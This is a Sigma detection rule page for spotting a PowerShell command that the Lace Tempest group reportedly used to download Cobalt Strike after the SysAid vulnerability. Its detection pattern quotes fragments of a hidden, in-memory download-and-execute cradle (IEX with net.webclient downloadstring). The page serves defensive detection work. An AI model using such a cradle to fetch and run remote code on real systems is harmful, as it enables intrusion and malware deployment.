Lace Tempest Cobalt Strike Download
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
Sigma rule (View on GitHub)
1title: Lace Tempest Cobalt Strike Download
2id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
3status: experimental
4description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
5references:
6 - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2023/11/09
9tags:
10 - attack.execution
11 - detection.emerging_threats
12logsource:
13 category: process_creation
14 product: windows
15detection:
16 selection:
17 CommandLine|contains|all:
18 - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(
19 - /a')
20 condition: selection
21falsepositives:
22 - Unlikely
23level: high
References
-
SysAid On-Prem Software CVE-2023-47246 Vulnerability - Learn about the security flaw in SysAid's on-premises software version.
Read More
Related rules
- Lace Tempest File Indicators
- Lace Tempest Malware Loader Execution
- Lace Tempest PowerShell Evidence Eraser
- Lace Tempest PowerShell Launcher
- Diamond Sleet APT File Creation Indicators